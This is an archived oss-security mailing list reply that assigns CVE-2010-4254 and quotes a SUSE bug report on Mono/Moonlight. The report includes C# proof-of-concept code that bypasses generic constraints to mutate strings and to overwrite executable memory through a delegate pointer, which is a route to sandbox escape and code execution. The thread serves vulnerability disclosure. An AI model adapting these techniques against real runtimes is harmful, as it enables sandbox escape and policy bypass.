[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] CVE request: mono/moonlight: execution of
From: Josh Bressers <bressers () redhat ! com>
Date: 2010-11-29 20:36:20
Message-ID: 1544809689.736861291062980367.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
[Download RAW message or body]
Please use CVE-2010-4254 for this.
Thanks.
--
JB
----- "Thomas Biege" <thomas@suse.de> wrote:
> Hello.
>
> Just a copy-n-paste from our bugzilla (again):
>
> ------------------------------------------------------------------------------
> SP 2010-11-24 20:45:21 UTC
>
> Original (pulled by author) blog entry:
>
> So I was messing around with generic methods and discovered that
> generic
> constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection
> (with the
> exception of the new() constraint). One of the fun results of this bug
> is that
> the String class can be made mutable without using reflection to set
> private
> members!
>
> The following code demonstrates this; it is legal and will run on Mono
> up to
> and including version 2.8:
>
> using System;
> using System.Reflection;
>
> public class FakeString {
> public int length;
> public char start_char;
> }
>
> public class TestCase {
> private static FakeString UnsafeConversion<T>(T thing)
> where T : FakeString
> {
> return thing;
> }
>
> public static void Main() {
> var a = "foo";
> var b = MakeMutable(a);
>
> Console.WriteLine(a);
> b.start_char = 'b';
> Console.WriteLine(a);
> }
>
> private static FakeString MakeMutable(string s)
> {
> var m = typeof(TestCase).GetMethod("UnsafeConversion",
> BindingFlags.NonPublic | BindingFlags.Static);
> var m2 = m.MakeGenericMethod(typeof(string));
>
> var d = (Func<string,
> FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>),
> null,
> m2);
>
> return d(s);
> }
> }
>
>
>
> Comment 1 SP 2010-11-24 20:54:20 UTC
>
> This is a follow up of the previous
> https://bugzilla.novell.com/show_bug.cgi?id=654136
>
> The original blog entry allow trusted (by moonlight) code to mutate
> strings
> which could be used to trick policies (e.g. give a valid URL and, once
>
> accepted
> as a valid xdomain URL, change it to something else).
>
> It can also be extended to arbitrary code execution. POC by Geoff
> Norton:
>
> using System;
> using System.Reflection;
> using System.Runtime.InteropServices;
>
> public class DelegateWrapper {
> public IntPtr method_ptr;
> }
>
> public delegate void MethodWrapper ();
>
> public class BreakSandbox {
> private static DelegateWrapper Convert <T> (T dingus) where T :
> DelegateWrapper {
> return dingus;
> }
>
> private static DelegateWrapper ConvertDelegate (Delegate del) {
> var m = typeof (BreakSandbox).GetMethod ("Convert",
> BindingFlags.NonPublic | BindingFlags.Static);
> var gm = m.MakeGenericMethod (typeof (Delegate));
>
> var d = (Func <Delegate, DelegateWrapper>)
> Delegate.CreateDelegate
> (typeof (Func <Delegate, DelegateWrapper>), null, gm);
>
> return d (del);
> }
>
> public static void Main (string [] args) {
> MethodWrapper d = delegate {
> Console.WriteLine ("Hello");
> };
>
> d ();
> var converted = ConvertDelegate (d);
> // Overwrite the already WX page with a 'ret'
> Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
> d ();
> }
> }
>
> This code won't execute on Moonlight (since all Marshal.* code is
> SecurityCritical) but it would not be hard to modify the POC to do the
> same
> without SecurityCritical code.
>
> Note: the bug is present in Mono but does not represent a security
> vulnerability there since Mono (unlike Moonlight) can only execute
> trusted
> code.
>
> [reply] [-]
> Private
> Comment 2
> ------------------------------------------------------------------------------
>
> --
> Thomas Biege <thomas@suse.de>, SUSE LINUX, Security Support &
> Auditing
> SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
> Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
> -- Marie von Ebner-Eschenbach
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic